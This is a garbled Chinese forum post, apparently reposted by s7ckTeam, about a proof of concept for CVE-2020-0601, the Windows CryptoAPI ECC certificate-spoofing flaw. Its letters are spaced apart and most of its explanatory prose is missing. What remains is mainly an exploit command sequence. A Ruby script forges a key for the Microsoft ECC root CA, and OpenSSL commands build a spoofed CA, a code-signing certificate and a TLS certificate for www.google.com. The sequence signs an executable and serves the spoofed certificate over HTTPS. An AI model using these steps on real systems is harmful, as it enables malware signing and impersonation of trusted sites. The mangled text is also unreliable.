[28667] 2020-12-04_CVE-2020-0601PoCCryptoAPI漏洞利用

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2020-12-04_CVE-2020-0601PoCCryptoAPI漏洞利用 C V E - 2 0 2 0 - 0 6 0 1   P o C   C r y p t o A P I O t s   2 0 2 0 - 1 2 - 0 4 N S A p o c W i n d o w s   C r y p t o A P I ( C r y p t 3 2 . d l l ) 线 H T T P S 使 使 P o C , E C C 线 p o c h t t p s : / / g i t h u b . c o m / o l l y p w n / C u r v e B a l l p o c W i n d o w s 1 0 使 E C C C A 使 C A P O C k a l i   l i n u x C A k e y k e y k e y x 5 0 9 仿 C A k e y ( C S R ) C A C A 使 仿 C A C A   k e y C S R 2 0 4 7 C A 2 0 4 3 仿 C A k e y P K C S 1 2 P E P E w i n 1 0 P E M i c r o s o f t E C C P r o d u c t R o o t C e r t i f i c a t e A u t h o r i t y . c e r o p e n s s l   1 . 1 . 0   r u b y   2 . 4 . 0 r u b y   m a i n . r b   . / M i c r o s o f t E C C P r o d u c t R o o t C e r t i f i c a t e A u t h o r i t y . c e r s p o o f e d _ c a . k e y o p e n s s l   r e q   - n e w   - x 5 0 9   - k e y   s p o o f e d _ c a . k e y   - o u t   s p o o f e d _ c a . c r t o p e n s s l   e c p a r a m   - n a m e   s e c p 3 8 4 r 1   - g e n k e y   - n o o u t   - o u t   c e r t . k e y o p e n s s l   r e q   - n e w   - k e y   c e r t . k e y   - o u t   c e r t . c s r   - c o n f i g   o p e n s s l _ c s . c o n f   - r e q e x t s   v 3 _ c s o p e n s s l   x 5 0 9   - r e q   - i n   c e r t . c s r   - C A   s p o o f e d _ c a . c r t   - C A k e y   s p o o f e d _ c a . k e y   - C A c r e a t e s e r i a l   - o u t   c e r t . c r t   - d a y s   1 0 0 0 0   - e x t f i l e   o p e n s s l _ c s . c o n f   - e x t e n s i o n s   v 3 _ c s o p e n s s l   p k c s 1 2   - e x p o r t   - i n   c e r t . c r t   - i n k e y   c e r t . k e y   - c e r t f i l e   s p o o f e d _ c a . c r t   - n a m e   " C o d e   S i g n i n g "   - o u t   c e r t . p 1 2 o s s l s i g n c o d e   s i g n   - p k c s 1 2   c e r t . p 1 2   - n   " S i g n e d   b y   o l l y p w n "   - i n   t e s t - x 6 4 . e x e   - o u t   t e s t _ s i g n e d . e x e
S S L / T L S k e y k e y x 5 0 9 仿 C A k e y S S L ( C S R ) C A C A r u b y   m a i n . r b   . / M i c r o s o f t E C C P r o d u c t R o o t C e r t i f i c a t e A u t h o r i t y . c e r s p o o f e d _ c a . k e y o p e n s s l   r e q   - n e w   - x 5 0 9   - k e y   s p o o f e d _ c a . k e y   - o u t   s p o o f e d _ c a . c r t o p e n s s l   e c p a r a m   - n a m e   s e c p 3 8 4 r 1   - g e n k e y   - n o o u t   - o u t   c e r t . k e y o p e n s s l _ t l s . c o n f C N   =   w w w . g o o g l e . c o m o p e n s s l   r e q   - n e w   - k e y   c e r t . k e y   - o u t   c e r t . c s r   - c o n f i g   o p e n s s l _ t l s . c o n f   - r e q e x t s   v 3 _ t l s
便 , t l s / i n d e x . j s k a l i n p m n o d e j s ( ) 访 8 0 8 0 h t t p s : / / i p : 8 0 8 0 H e l l o   W o r l d h t t p s : / / g i t h u b . c o m / o l l y p w n / C V E - 2 0 2 0 - 0 6 0 1 h t t p s : / / r e s e a r c h . k u d e l s k i s e c u r i t y . c o m / 2 0 2 0 / 0 1 / 1 5 / c v e - 2 0 2 0 - 0 6 0 1 - t h e - c h a i n o f f o o l s - a t t a c k - e x p l a i n e d - w i t h - p o c / o p e n s s l   x 5 0 9   - r e q   - i n   c e r t . c s r   - C A   s p o o f e d _ c a . c r t   - C A k e y   s p o o f e d _ c a . k e y   - C A c r e a t e s e r i a l   - o u t   c e r t . c r t   - d a y s   1 0 0 0 0   - e x t f i l e   o p e n s s l _ t l s . c o n f   - e x t e n s i o n s   v 3 _ t l s c e r t . c r t c e r t . k e y s p o o f e d _ c a . c r t n o d e   i n d e x . j s h t t p s : / / w w w . j i a n s h u . c o m / p / c 8 9 f b 4 2 e b 9 9 f
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则